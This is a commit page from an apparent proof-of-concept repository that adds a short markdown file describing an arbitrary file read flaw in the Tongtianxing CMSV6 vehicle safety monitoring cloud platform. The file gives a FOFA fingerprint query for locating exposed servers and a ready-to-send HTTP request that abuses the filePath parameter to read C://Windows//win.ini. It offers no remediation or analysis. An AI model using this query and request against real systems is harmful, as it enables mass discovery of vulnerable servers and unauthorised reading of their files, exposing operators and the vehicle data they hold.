admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md

Browse Source
This commit is contained in:
wy876 2024-02-28 19:13:21 +08:00 committed by GitHub
parent 8e6d282d26
commit e62abef039
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 17 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,17 @@
## 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞
## fofa
```
body="./open/webApi.html"||body="/808gps/"
```
## poc
```
GET /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100 HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```
![image](https://github.com/wy876/POC/assets/139549762/4c7d4c08-d72f-477b-9604-f9cec433e39c)